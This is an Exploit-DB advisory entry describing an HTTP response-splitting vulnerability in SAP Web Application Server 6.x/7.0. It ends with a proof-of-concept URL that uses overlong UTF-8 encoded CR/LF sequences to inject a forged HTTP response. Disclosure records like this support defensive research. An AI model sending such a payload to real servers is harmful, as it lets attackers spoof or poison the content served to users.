SAP Web Application Server 6.x/7.0 Input Validation Vulnerability

2005-11-09T00:00:00
ID EDB-ID:27887
Type exploitdb
Reporter Arnold Grossmann
Modified 2005-11-09T00:00:00

Description

SAP Web Application Server 6.x/7.0 Input Validation Vulnerability. CVE-2006-1039. Remote exploits for multiple platform

                                        
                                            source: http://www.securityfocus.com/bid/18006/info

SAP Web Application Server is prone to an input-validation vulnerability that results in HTTP response-splitting attacks. This issue is due to a failure in the application to properly sanitize user-supplied input.

A remote attacker may exploit this vulnerability to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that attempt to entice client users into a false sense of trust.

http://sap-was/x.htm;%20HTTP%c0%af1.0%20200%20OK%c0%8d%c0%8aContent-Length:%2035%c0%8d%c0%8aContent-Type:text%c0%afhtml%c0%8d%c0%8a%c0%8d%c0%8a%3Chtml%3e%3cbody%3ehello%3c%c0%afbody%3e%3c%c0%afhtml%3e%c0%8d%c0%8a%c0%8d%c0%8a